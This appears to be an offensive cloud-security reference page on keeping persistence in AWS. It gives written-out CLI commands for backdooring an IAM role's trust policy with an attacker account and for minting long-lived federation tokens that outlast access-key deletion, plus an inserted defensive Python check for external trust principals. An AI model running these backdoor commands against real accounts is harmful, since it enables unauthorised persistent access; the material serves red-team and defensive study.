Maintaining Persistence
Tips and tricks for maintaining persistence in AWS
Creating an Access Key for an IAM User
See details here iam:CreateAccessKey
Backdoor an IAM Role
IAM Roles have Trust Policies, which dictate who or what (user/role/service) can assume the Role and gain access to its credentials and permissions. With the iam:UpdateAssumeRolePolicy permission, a threat actor can modify the role's trust policy and gain access to it.
aws iam update-assume-role-policy --role-name Engineering --policy-document file://attacker-trust-policy.json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": [
          "arn:aws:iam::111111111111:user/legitimate-user",
          "arn:aws:iam::222222222222:user/threat-actor"
        ]
      },
      "Action": "sts:AssumeRole"
    }
  ]
}
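A defensive check for this technique, as an added example that is not part of the original page: it parses a role trust policy (the AssumeRolePolicyDocument returned by `aws iam get-role`) and lists principals outside an allowlist of account IDs. The function names and the allowlist are assumptions; the sample input is the policy shown above.

```python
import json
import re

# Constructed sample input: the trust policy shown above.
SAMPLE_TRUST_POLICY = """
{"Version": "2012-10-17",
 "Statement": [{"Effect": "Allow",
                "Principal": {"AWS": ["arn:aws:iam::111111111111:user/legitimate-user",
                                      "arn:aws:iam::222222222222:user/threat-actor"]},
                "Action": "sts:AssumeRole"}]}
"""

ARN_ACCOUNT = re.compile(r"^arn:aws[a-z-]*:(?:iam|sts)::(\d{12}):")


def _as_list(value):
    # Policy fields may hold a single value or a list of values.
    return value if isinstance(value, list) else [value]


def principal_account(principal):
    """Return the 12-digit account ID of an AWS principal, or None if unknown."""
    if re.fullmatch(r"\d{12}", principal):  # bare account ID form
        return principal
    match = ARN_ACCOUNT.match(principal)
    return match.group(1) if match else None


def external_principals(policy_doc, trusted_accounts):
    """List AWS principals in Allow statements that fall outside trusted_accounts.

    Service and Federated principals are not evaluated here. Wildcards and
    values with no recognisable account ID are reported as well.
    """
    policy = json.loads(policy_doc) if isinstance(policy_doc, str) else policy_doc
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if isinstance(principal, str):  # "Principal": "*" trusts everyone
            findings.append(principal)
            continue
        for p in _as_list(principal.get("AWS", [])):
            if p == "*" or principal_account(p) not in trusted_accounts:
                findings.append(p)
    return findings
```

Run it over every role's trust policy with the set of account IDs your organization owns; any returned principal is a trust relationship to review.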
Generating Temporary AWS Credentials from CloudShell
See details here Generate IAM Access Keys from CloudShell
Generating Temporary AWS Credentials from IAM User
The following command allows you to generate temporary (15 min - 36 hours) credentials from an IAM User. This does not work with IAM Roles.
You can specify any name you want — it doesn't need to be a real user
You can specify any policy you want (up to 10 managed and/or inline policies)
Ultimately, you only have the permissions the user running this command has even if you pass the administrator policy as a command argument
If the permissions of the user that generated these credentials are altered (gained or lost), the change also affects the active session credentials
These credentials still work even if the IAM User's access keys have been deactivated and/or deleted
aws sts get-federation-token --name sally --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess --duration-seconds 129600